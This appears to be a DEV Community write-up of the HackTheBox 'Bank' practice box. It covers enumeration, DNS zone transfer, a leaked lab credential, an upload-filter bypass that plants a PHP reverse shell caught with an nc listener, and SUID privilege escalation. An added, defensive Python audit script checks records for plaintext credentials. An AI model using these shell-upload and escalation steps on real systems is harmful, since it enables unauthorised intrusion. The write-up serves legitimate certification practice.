DEV Community

Chris 'Huey' S

Writeup: HackTheBox Bank- Without Metasploit (OSCP Prep)

Hello all,

Some quick updates: I decided to schedule my OSCP for early October to give me enough time to run through some more boxes, then move over to Proving Grounds on OffSec's platform.

Now let's jump right in!!

Command:

nmap -sC -sV -T4 -oN nmap.txt 10.10.10.29

  1. -sC = Run the default scripts
  2. -sV = Probe open ports to determine service/version info
  3. -T4 = Set the timing template for faster scanning (0-5)
  4. -oN = Save normal output to a file

Ports Open:

  1. 22 SSH OpenSSH 6.6.1p1
  2. 53 ISC Bind 9.0.5-3ubuntu0
  3. 80 HTTP Apache HTTPD 2.4.7

Let's run a quick Vulnerability Scan to see what we can find.

Command:

nmap --script vuln -T4 -oN vuln.txt 10.10.10.29

So I see a DoS here but that doesn't really help us because we want to get an RCE on the box :-).

I am going to head over to the site to see what I find there...

Something I did while on the site was to check out the source and some of the directories listed, but nothing too special stuck out for me.

I am going to run Dirb to see if there are any hidden directories here.

Both of these paths bring up a Forbidden page.

Let's now try using Gobuster.

Command:

gobuster dir -e -u http://10.10.10.29 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Since port 53 is open, I am going to check out the DNS records.

Command:

nslookup
127.0.0.1
10.10.10.29
bank.htb

Notice that looking up the IP address fails, but looking up bank.htb returns the addresses.

Command:

dig axfr @10.10.10.29

As we can see, not too many hits...

dig axfr bank.htb @10.10.10.29

I am going to edit /etc/hosts and /etc/resolv.conf.

Command:

10.10.10.29 bank.htb

Command:

nano /etc/resolv.conf
nameserver 10.10.10.29

Let's try and re-run GoBuster!

Command:

gobuster dir -e -u http://10.10.10.29 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

After making those quick additions we get a lot more hits. So let's go check them out.

Clicking on the Parent Directory brings up a login screen for an Email and Password. I tried some dummy emails and common enumeration but it didn't work.

Now I am going to check out the Balance-Transfer directory to see if there is anything interesting there.

Each of these looks like a specific user account, with a hashed email and password and the account balance. If you go down the list, each link provides a different account.

One thing we will do is sort by size to see if there are any differences.

After doing so we see there is a .acc file of size 257 here, unlike the rest. Open it and let's take a look.

Here we can see there is unhashed account information, such as:

  1. Email = chris@bank.htb
  2. Password = !##HTBB4nkP4ssw0rd!##
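As an added example (not code from the original post), here is a small Python audit that automates the check just described: it finds the size outlier among a set of .acc-style records and flags any record whose email or password field is stored in plaintext rather than as a hex digest. This is the check a defender would run over such an export before publishing it. The record layout, filenames and values below are constructed assumptions, not the box's real file format.

```python
import re
import statistics

# Constructed sample records (not from the page): a simplified stand-in for the
# account dumps described above, with one record left in plaintext.
SAMPLE_ACC_FILES = {
    "acct-01.acc": "Email: 6f8db599de986fab7a21625b7916589c\nPassword: 5d41402abc4b2a76b9719d911017c592\nBalance: 1043.10\n",
    "acct-02.acc": "Email: d8578edf8458ce06fbc5bb76a58c5ca4\nPassword: e99a18c428cb38d5f260853678922e03\nBalance: 220.00\n",
    "acct-03.acc": "Email: chris@bank.htb\nPassword: !##HTBB4nkP4ssw0rd!##\nBalance: 8.00\n",
    "acct-04.acc": "Email: 098f6bcd4621d373cade4e832627b4f6\nPassword: ad0234829205b9033196ba818f7a872b\nBalance: 77.50\n",
}

HEX_DIGEST = re.compile(r"^[0-9a-f]{32}$")  # MD5-length lowercase hex digest

def parse_acc(text):
    """Return a dict of the 'Key: value' lines in one record (keys lowercased)."""
    fields = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip().lower()] = value.strip()
    return fields

def plaintext_fields(fields):
    """Credential field names whose value is not a 32-char hex digest."""
    return [k for k in ("email", "password")
            if k in fields and not HEX_DIGEST.match(fields[k])]

def size_outliers(files, threshold=2.0):
    """Filenames whose byte size deviates from the median by more than
    `threshold` median-absolute-deviations: the sort-by-size heuristic, automated."""
    sizes = {name: len(body.encode()) for name, body in files.items()}
    median = statistics.median(sizes.values())
    mad = statistics.median(abs(s - median) for s in sizes.values()) or 1
    return sorted(n for n, s in sizes.items() if abs(s - median) / mad > threshold)

def audit(files):
    """Map filename -> plaintext credential fields, for records that have any."""
    findings = {}
    for name, body in files.items():
        bad = plaintext_fields(parse_acc(body))
        if bad:
            findings[name] = bad
    return findings

if __name__ == "__main__":
    print("size outliers:", size_outliers(SAMPLE_ACC_FILES))
    print("plaintext credentials:", audit(SAMPLE_ACC_FILES))
```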

Now head back over to the login screen again and put in the creds we just found.

Click the Support link and it will bring up a way for the current user to submit files.

On my Kali machine I create a test file to see if I can upload a file.

Command:

touch test.php

Now on your console try and upload it.

Change it from a php file to a jpg file.

So I did some quick GoogleFu and I didn't see any JPG reverse-shells. But when I inspected the page I came across this line of text.

So let's grab a php-reverse-shell, then we can update the code to hopefully get a shell.

Command:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

nano php-reverse-shell.php
Change the IP to your tun0 address and set the port to the one you will listen on
chmod +x php-reverse-shell.php

Now we are going to rename the .php file to a .htb file.

Command:

mv php-reverse-shell.php shell.htb

Now let's re-upload this back to the site.

Command:

nc -nvlp 1234

Give it a few seconds then you should get access!

Now let's upgrade the shell using the following script.

Command:

python -c 'import pty; pty.spawn("/bin/bash")'

Command:

whoami

Priv Esc

Command:

find / -perm -4000 2>/dev/null

The emergency binary shows up in the SUID list, so it should run with its owner's permissions rather than ours.

Command:

cd /var/htb/bin
ls
./emergency
whoami

Now locate the root and user .txt files.

Discussion (1)

wireless90

Can you explain more about the find perm command? What are we trying to do?